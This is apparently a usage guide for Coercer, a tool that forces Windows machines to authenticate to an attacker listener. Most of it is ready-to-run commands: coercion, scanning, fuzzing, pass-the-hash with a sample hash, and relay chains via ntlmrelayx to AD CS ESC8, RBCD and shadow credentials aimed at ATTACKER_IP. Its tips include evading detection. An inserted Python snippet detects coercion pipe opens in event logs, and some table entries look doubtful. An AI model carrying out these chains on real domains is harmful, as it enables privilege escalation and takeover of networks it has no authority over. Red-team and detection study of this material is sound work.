# Coercer
Coercer is a Python tool that automates Windows authentication coercion attacks by triggering NTLM authentication from target machines to an attacker-controlled listener. It supports multiple coercion methods including PetitPotam, PrinterBug, DFSCoerce, and ShadowCoerce, enabling NTLM relay attacks for AD privilege escalation.
## Installation

### Via pip

```bash
pip install coercer
```

### From GitHub

```bash
git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt
python3 -m coercer --help
```

### Requirements

- Python 3.8+
- impacket
- pycryptodomex
- requests
- argparse
## Quick Start

Basic coercion with credentials:

```bash
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

Scan a target to identify working methods:

```bash
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

Coerce with an NTLM hash:

```bash
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d DOMAIN
```
## Coercion Methods

Coercer supports numerous coercion methods across different MS-RPC protocols and Windows services:

| Method | Service | Protocol | MS-RPC Interface | Impact |
|---|---|---|---|---|
| PetitPotam | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| PrinterBug | Spooler | \\pipe\spoolss | Printer (RPC) | High - SYSTEM auth |
| DFSCoerce | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| ShadowCoerce | Shadow Copy VSS | \\pipe\vssadmin | FSRVP | Medium - SYSTEM auth |
| MSEFSRCoerce | EFSRPC | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Webexec | WebClient | HTTP | IOCTL | Medium - User context |
| DFSCoerceRPC | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| RprRemoteFindFirstFile | RemoteRegistry | \\pipe\winreg | RemoteRegistry | Low - Registry read |
| EfsRpcOpenFileRaw | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Lsasrv | LSA | \\pipe\lsarpc | LSA | Medium - LSASS auth |
| Tssession | Terminal Services | \\pipe\tssession | TermSrv | Low - TS context |
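From the defender's side, the named pipes in this table are what a coercion attempt has to open on the target over IPC$. The following is an added example (not part of Coercer) that checks Windows Security event 5145 records for IPC$ opens of those pipes and flags a client that touches several of them, which is what a `coercer scan` run looks like from the target. Field names follow the 5145 event; the records themselves are constructed sample data.

```python
# Added defensive example (not Coercer code): flag IPC$ named-pipe opens
# recorded in Windows Security event 5145 that match the pipes in the table.
from collections import defaultdict

# Pipe name -> method, taken from the Coercion Methods table (lower-cased).
COERCION_PIPES = {
    "efsrpc": "PetitPotam / MSEFSRCoerce / EfsRpcOpenFileRaw",
    "spoolss": "PrinterBug",
    "netdfs": "DFSCoerce / DFSCoerceRPC",
    "vssadmin": "ShadowCoerce",
    "winreg": "RprRemoteFindFirstFile",
    "lsarpc": "Lsasrv",
    "tssession": "Tssession",
}

def event(eid, share, target, ip, user):
    # Helper for constructed, flattened 5145-style records (sample data only).
    return {"EventID": eid, "ShareName": share, "RelativeTargetName": target,
            "IpAddress": ip, "SubjectUserName": user}

# Constructed sample: one client walks three coercion pipes in sequence,
# plus benign IPC$ and file-share activity and an unrelated logon event.
SAMPLE_EVENTS = [
    event(5145, "\\\\*\\IPC$", "efsrpc", "192.168.1.100", "user"),
    event(5145, "\\\\*\\IPC$", "spoolss", "192.168.1.100", "user"),
    event(5145, "\\\\*\\IPC$", "NETDFS", "192.168.1.100", "user"),
    event(5145, "\\\\*\\IPC$", "srvsvc", "192.168.1.77", "alice"),   # share listing
    event(5145, "\\\\*\\SYSVOL", "efsrpc", "192.168.1.77", "alice"),  # a file, not a pipe
    event(4624, "", "", "192.168.1.77", "alice"),                     # not a share event
]

def coercion_pipe_opens(events):
    """Return (client_ip, user, pipe, method) for each IPC$ open of a known pipe."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 5145 or not ev.get("ShareName", "").upper().endswith("IPC$"):
            continue  # the RPC calls ride over IPC$, so file-share events are noise
        pipe = ev.get("RelativeTargetName", "").lower()
        if pipe in COERCION_PIPES:
            hits.append((ev["IpAddress"], ev["SubjectUserName"], pipe, COERCION_PIPES[pipe]))
    return hits

def scanning_clients(events, min_pipes=2):
    """Clients that opened at least min_pipes distinct coercion pipes."""
    seen = defaultdict(set)
    for ip, _user, pipe, _method in coercion_pipe_opens(events):
        seen[ip].add(pipe)
    return {ip: sorted(p) for ip, p in seen.items() if len(p) >= min_pipes}
```

A single open of one of these pipes is routine on a domain (e.g. `lsarpc` from legitimate clients); the client-level roll-up in `scanning_clients` is the part worth alerting on.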
## Scan Mode

Enumerate which coercion methods work without triggering full authentication:

```bash
# Scan all methods
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Scan with NTLM hash
coercer scan -t 192.168.1.50 -u domain\\user -H HASH -d DOMAIN

# Filter by method name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-method PetitPotam

# Filter by protocol
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-protocol EfsRpc

# Filter by pipe name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-pipe-name efsrpc

# Scan with a timeout per method
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 10
```

## Coerce Mode

Trigger actual NTLM authentication to the listener:

```bash
# Basic coercion to listener
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Coerce with a specific method
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --method PetitPotam

# Coerce with verbose output
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -v

# Coerce to an alternative port
coercer coerce -l 192.168.1.100:4444 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Coerce with timeout
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 30
```

## Fuzz Mode

Discover new coercion methods by fuzzing RPC endpoints:

```bash
# Fuzz target to discover methods
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100

# Fuzz a specific pipe
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --pipe efsrpc

# Fuzz with timeout
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --timeout 30
```
## Authentication Options

### Username/Password Authentication

```bash
coercer coerce -l LISTENER -t TARGET -u domain\\username -p password -d DOMAIN
coercer coerce -l LISTENER -t TARGET -u username -p password -d DOMAIN
```

### NTLM Hash Authentication (Pass-the-Hash)

```bash
coercer coerce -l LISTENER -t TARGET -u domain\\username -H LM:NTLM -d DOMAIN
coercer coerce -l LISTENER -t TARGET -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
```

### Kerberos Authentication

```bash
coercer coerce -l LISTENER -t TARGET -k -d DOMAIN
export KRB5CCNAME=/tmp/user.ccache
coercer coerce -l LISTENER -t TARGET -k
```

### No Authentication

```bash
coercer coerce -l LISTENER -t TARGET --no-pass
coercer scan -t TARGET --no-pass
```

### Local Authentication

```bash
coercer coerce -l LISTENER -t TARGET --local
```
## Listener Setup

### Using ntlmrelayx (SMB Relay)

```bash
# Terminal 1: Start ntlmrelayx
ntlmrelayx.py -t 192.168.1.60 --no-http-server -smb2support

# Terminal 2: Run coercer
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

### Using Responder (LLMNR/NBT-NS)

```bash
# Terminal 1: Start Responder
responder -I eth0 -v

# Terminal 2: Run coercer with SMB relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

### Custom SMB Server Listener

```bash
# Using impacket smbserver
smbserver.py -smb2support -ip 192.168.1.100 share /tmp

# Run coercer to relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

### Listening on a Specific Port

```bash
coercer coerce -l 192.168.1.100:445 -t TARGET -u domain\\user -p password -d DOMAIN
```
## Common Attack Chains

### Coerce to ntlmrelayx → AD CS ESC8

```bash
# Terminal 1: Start ntlmrelayx targeting AD CS
ntlmrelayx.py -t http://dc.domain.local/certsrv/certfnsh.asp -template DomainController --no-http-server -smb2support

# Terminal 2: Coerce to relay
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN
```

### Coerce to ntlmrelayx → LDAP for RBCD

```bash
# Terminal 1: Start ntlmrelayx for LDAP relay with RBCD
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --delegate-access

# Terminal 2: Coerce target
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN
```

### Coerce to Relay for Shadow Credentials

```bash
# Terminal 1: Start ntlmrelayx targeting LDAP
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --shadow-credentials

# Terminal 2: Trigger coercion
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN
```

### Coerce Machine Account to Relay for Privilege Escalation

```bash
# Scan first to find a working method
coercer scan -t DC_IP -u domain\\user -p password -d DOMAIN

# Coerce DC to listener for relay to AD CS
coercer coerce -l ATTACKER_IP -t DC_IP -u domain\\user -p password -d DOMAIN --method PetitPotam
```

### WebDAV Coercion

Force HTTP authentication instead of SMB for cross-protocol relay attacks:

```bash
# Enable WebDAV coercion (requires WebClient service running)
coercer coerce -l http://ATTACKER_IP:80 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# WebDAV with custom path
coercer coerce -l http://ATTACKER_IP:8080/share -t TARGET -u domain\\user -p password -d DOMAIN

# Combine with HTTP listener on ntlmrelayx
ntlmrelayx.py -I http://ATTACKER_IP:8080 -t http://target.com --no-smb-server
coercer coerce -l http://ATTACKER_IP:8080 -t TARGET -u domain\\user -p password -d DOMAIN
```
## Filtering Options

### Filter by Method Name

```bash
# Only PetitPotam
coercer scan -t TARGET -u domain\\user -p password --filter-method PetitPotam

# Multiple methods
coercer scan -t TARGET -u domain\\user -p password --filter-method "PetitPotam|PrinterBug"
```

### Filter by Protocol Name

```bash
# Only EfsRpc protocol
coercer scan -t TARGET -u domain\\user -p password --filter-protocol EfsRpc

# Multiple protocols
coercer scan -t TARGET -u domain\\user -p password --filter-protocol "EfsRpc|NetDFS"
```

### Filter by Pipe Name

```bash
# Only efsrpc pipe
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name efsrpc

# Multiple pipes
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name "efsrpc|netdfs"
```

### Combine Filters

```bash
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN \
    --filter-method PetitPotam \
    --filter-protocol EfsRpc
```
## Troubleshooting

### Target Unreachable

```bash
# Verify connectivity
ping TARGET_IP

# Test SMB connectivity (smbclient takes credentials as -U 'user%password')
smbclient -L //TARGET_IP -U 'domain\user%password'

# Test with a longer timeout
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN --timeout 30
```

### Authentication Failed

```bash
# Verify credentials
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Try an alternative username format
coercer scan -t TARGET -u DOMAIN\\user -p password -d DOMAIN

# Use an NTLM hash instead
coercer scan -t TARGET -u domain\\user -H HASH -d DOMAIN
```

### Service Not Available

```bash
# Some methods require specific services to be running
# Check whether the MSDFS, Spooler, or EfsRpc services are active
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Retry with a longer timeout
coercer coerce -l LISTENER -t TARGET -u domain\\user -p password -d DOMAIN --timeout 60
```

### No Working Methods Found

```bash
# The method may be patched or disabled
# Try scanning with verbose output
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Enumerate installed hotfixes (run on the Windows host)
wmic qfe list brief /format:list
```

### Listener Connection Issues

```bash
# Verify the listener is running and reachable
telnet LISTENER_IP 445

# Check firewall rules
sudo ufw allow 445/tcp

# Use verbose logging
coercer coerce -l LISTENER_IP -t TARGET -u domain\\user -p password -d DOMAIN -v
```
## Best Practices

- Always Scan First: Use `coercer scan` to identify working methods before triggering full coercion
- Use Specific Methods: Target known-working methods to avoid noise and detection
- Filter Results: Leverage filtering to reduce network activity and operational footprint
- Combine with Relay: Pair Coercer with ntlmrelayx or Responder for effective privilege escalation
- Monitor Logs: Coercion attempts generate security event logs; operate during high activity periods
- Patch Management: Target systems with outdated patches are more likely to support multiple methods
- Service Enumeration: Verify target services (Spooler, EfsRpc, MSDFS) are running before coercion
- Credential Handling: Use NTLM hashes or Kerberos tickets to avoid passing plaintext credentials
- Clean Relay Chains: Ensure ntlmrelayx or the relay tool in use is properly configured before coercing
- Documentation: Log all coercion attempts, timing, and results for post-exploitation analysis
## Related Tools

| Tool | Purpose |
|---|---|
| PetitPotam | Standalone EfsRpc coercion tool; foundation for Coercer |
| ntlmrelayx | NTLM relay framework to authenticate against other services |
| Responder | LLMNR/NBT-NS poisoning and relay tool |
| Certipy | Active Directory Certificate Services enumeration and exploitation |
| krbrelayx | Kerberos relay attacks and alternative authentication methods |
| SpoolSample | Standalone PrinterBug implementation |
| PrintNightmare | RCE exploit for CVE-2021-1675 via Print Spooler |
| Shadow Credentials | Credential dumping via shadow credentials in Active Directory |